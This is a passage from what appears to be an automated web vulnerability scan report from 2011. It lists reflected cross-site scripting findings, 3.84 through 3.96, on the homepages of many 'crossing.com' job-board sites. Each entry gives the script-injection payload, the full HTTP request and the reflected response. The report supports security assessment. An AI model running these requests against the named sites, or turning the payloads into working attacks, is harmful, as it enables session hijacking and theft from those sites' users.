Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=qieacg3sf3ukten0tvgskqclr5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:55 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:55 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 113405

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.logisticscrossing.com/?2c0f2"><script>alert(1)</script>581f158145d=1">
...[SNIP]...

3.84. http://www.managercrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.managercrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa799"><script>alert(1)</script>4bc6ed1bde1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?fa799"><script>alert(1)</script>4bc6ed1bde1=1 HTTP/1.1
Host: www.managercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:18 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=94ctq8p6ivl3v99kap75ucf440; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:18 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:18 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:18 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:18 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:18 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:18 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:18 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:18 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 128649

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.managercrossing.com/?fa799"><script>alert(1)</script>4bc6ed1bde1=1">
...[SNIP]...

3.85. http://www.manufacturingcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manufacturingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c71b"><script>alert(1)</script>02fbec31cd7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?3c71b"><script>alert(1)</script>02fbec31cd7=1 HTTP/1.1
Host: www.manufacturingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:53 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=2vlv8pl6j195dlj5ftspu2fa42; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:54 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:54 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:54 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:54 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:54 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:54 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:54 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:54 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 121495

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.manufacturingcrossing.com/?3c71b"><script>alert(1)</script>02fbec31cd7=1">
...[SNIP]...

3.86. http://www.marketingcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.marketingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2da59"><script>alert(1)</script>7f14b1855c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2da59"><script>alert(1)</script>7f14b1855c9=1 HTTP/1.1
Host: www.marketingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:45 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: PHPSESSID=3j1g01ot7jp0c1torvm4m80pj2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:45 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:45 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:45 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:45 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:45 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:45 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:45 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 131635

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.marketingcrossing.com/?2da59"><script>alert(1)</script>7f14b1855c9=1">
...[SNIP]...

3.87. http://www.mediajobcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mediajobcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 444a4"><script>alert(1)</script>f1c71a28164 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?444a4"><script>alert(1)</script>f1c71a28164=1 HTTP/1.1
Host: www.mediajobcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:30 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=kmd4t8g4d1d4ki1cuj88l3bbe7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:30 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:30 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:30 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:30 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:30 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:30 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:30 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:30 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 122756

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.mediajobcrossing.com/?444a4"><script>alert(1)</script>f1c71a28164=1">
...[SNIP]...

3.88. http://www.militarycrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.militarycrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0099"><script>alert(1)</script>0eefe3fc8f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f0099"><script>alert(1)</script>0eefe3fc8f1=1 HTTP/1.1
Host: www.militarycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:38 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=07205f964obb17b1v9f3cfauq6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:38 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:38 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:38 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:38 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:38 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:38 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:38 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:38 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 104794

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.militarycrossing.com/?f0099"><script>alert(1)</script>0eefe3fc8f1=1">
...[SNIP]...

3.89. http://www.nursingcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nursingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e967"><script>alert(1)</script>7f175de2ffb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?3e967"><script>alert(1)</script>7f175de2ffb=1 HTTP/1.1
Host: www.nursingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:05 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gj77rk9bta460ddthltprn68v7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:05 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:05 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:05 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:05 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:05 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:05 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:05 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:05 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 104462

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.nursingcrossing.com/?3e967"><script>alert(1)</script>7f175de2ffb=1">
...[SNIP]...

3.90. http://www.occupationaltherapycrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.occupationaltherapycrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 718c9"><script>alert(1)</script>ed54ab267f0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?718c9"><script>alert(1)</script>ed54ab267f0=1 HTTP/1.1
Host: www.occupationaltherapycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:30 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ntth3d6lgao3t4tjcnm0jeuoa2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:30 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:30 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:30 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:30 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:30 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:30 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:30 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:30 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106559

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.occupationaltherapycrossing.com/?718c9"><script>alert(1)</script>ed54ab267f0=1">
...[SNIP]...

3.91. http://www.operationscrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.operationscrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c43e7"><script>alert(1)</script>39abb463529 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c43e7"><script>alert(1)</script>39abb463529=1 HTTP/1.1
Host: www.operationscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:08 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=vmuk5k202atl7l2lqpceah52g3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:08 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:08 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:08 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:08 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:08 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:08 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:08 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:08 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 118202

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.operationscrossing.com/?c43e7"><script>alert(1)</script>39abb463529=1">
...[SNIP]...

3.92. http://www.parttimecrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.parttimecrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74114"><script>alert(1)</script>f6783053e84 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?74114"><script>alert(1)</script>f6783053e84=1 HTTP/1.1
Host: www.parttimecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:19 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=autgq8pu824jrji4an8ujk4c15; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:19 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:19 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:19 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:19 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:19 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:19 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:19 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:19 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 110622

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.parttimecrossing.com/?74114"><script>alert(1)</script>f6783053e84=1">
...[SNIP]...

3.93. http://www.pharmaceuticalcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pharmaceuticalcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20b38"><script>alert(1)</script>ef57d7684ea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?20b38"><script>alert(1)</script>ef57d7684ea=1 HTTP/1.1
Host: www.pharmaceuticalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:29 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=mihqustv5smd5unl99nhgf6ie2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:29 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:29 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:29 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:29 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:29 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:29 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:29 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:29 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119527

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.pharmaceuticalcrossing.com/?20b38"><script>alert(1)</script>ef57d7684ea=1">
...[SNIP]...

3.94. http://www.physicalsecuritycrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.physicalsecuritycrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 587a0"><script>alert(1)</script>15ac57f2af2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?587a0"><script>alert(1)</script>15ac57f2af2=1 HTTP/1.1
Host: www.physicalsecuritycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:58 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=6n27njhk9iq46bh77j2bk4h5b3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:58 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:58 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:58 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:58 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:58 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:58 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:58 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:58 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 107084

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.physicalsecuritycrossing.com/?587a0"><script>alert(1)</script>15ac57f2af2=1">
...[SNIP]...

3.95. http://www.physicaltherapycrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.physicaltherapycrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a1b8"><script>alert(1)</script>a05ed2ff752 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4a1b8"><script>alert(1)</script>a05ed2ff752=1 HTTP/1.1
Host: www.physicaltherapycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:24 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=a8c9mu27mlnqa553k64g321h72; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:25 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:25 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:25 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:25 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:25 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:25 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:25 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:25:25 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116184

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.physicaltherapycrossing.com/?4a1b8"><script>alert(1)</script>a05ed2ff752=1">
...[SNIP]...

3.96. http://www.planningcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.planningcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 131dd"><script>alert(1)</script>32e79ab8991 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?131dd"><script>alert(1)</script>32e79ab8991=1 HTTP/1.1
